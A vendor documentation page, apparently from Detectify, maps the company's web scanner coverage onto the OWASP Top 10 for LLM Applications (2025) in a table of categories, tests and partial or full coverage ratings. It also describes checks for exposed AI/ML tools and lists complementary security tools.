OWASP LLM Top 10
What it is — The OWASP Top 10 for Large Language Model Applications identifies the most critical security risks specific to applications that integrate large language models (LLMs). Published by OWASP , the current version (2025) addresses risks from prompt injection and improper output handling to supply chain vulnerabilities in AI/ML deployments.
Appsec relevance — LLM applications are web applications with additional attack vectors. Traditional web security risks (injection, information disclosure, authentication bypass) still apply, and new risks emerge from the model integration layer.
How Detectify Supports the OWASP LLM Top 10:2025
| Category | What it covers | Detectify Coverage | Coverage |
|---|---|---|---|
| LLM01:2025 Prompt Injection | Crafted inputs manipulate the LLM into executing unintended actions or bypassing guardrails | Template injection tests CWE-1336 provide foundational coverage for server-side prompt injection patterns | Partial |
| LLM02:2025 Sensitive Information Disclosure | LLM inadvertently reveals confidential data such as PII, credentials, or proprietary information in responses | Information exposure detection CWE-200 covers data leakage in web responses | Partial |
| LLM03:2025 Supply Chain | Vulnerabilities in third-party components, pre-trained models, or training data compromise application security | Technology and component detection via Surface Monitoring, CVE-specific test modules generated by Alfred AI | Partial |
| LLM05:2025 Improper Output Handling | LLM output is passed to downstream components without validation, enabling XSS, SSRF, or code execution | XSS, SQL injection, and other injection tests detect improper handling of LLM output rendered in web contexts | Full (web output contexts) |
| LLM07:2025 System Prompt Leakage | System prompts or instructions are exposed to users, potentially revealing sensitive business logic, API keys, or internal configurations | Information exposure detection CWE-200 identifies sensitive data leakage in web responses | Partial |
AI/ML Tool Exposure Detection
Detectify includes dedicated tests for exposed and unauthenticated AI/ML tools, including Gradio, ComfyUI, llama.cpp, Open WebUI, Stable Diffusion WebUI, Jan.ai, Xinference, and others. These tests detect publicly accessible AI infrastructure that should not be exposed to the internet — a practical security risk that goes beyond the LLM Top 10 categories.
What Detectify Covers
Detectify addresses the web application security layer of LLM deployments. It detects injection vulnerabilities that could enable prompt injection, identifies improper output handling that leads to XSS or further injection, and discovers exposed AI/ML infrastructure. For categories where traditional DAST testing applies (LLM01, LLM02, LLM03, LLM05), Detectify provides partial to full coverage.
Categories related to model internals (data and model poisoning, excessive agency, system prompt leakage, misinformation, unbounded consumption) are outside the scope of DAST testing.
Complementary Tools You May Need
- LLM-specific security testing tools — For prompt injection testing beyond template injection patterns
- Model monitoring and observability — For detecting anomalous model behavior
- Software composition analysis (SCA) — For comprehensive supply chain tracking of ML dependencies
- Access control and IAM — For restricting model access and preventing model theft
- Red teaming — For evaluating LLM-specific attack scenarios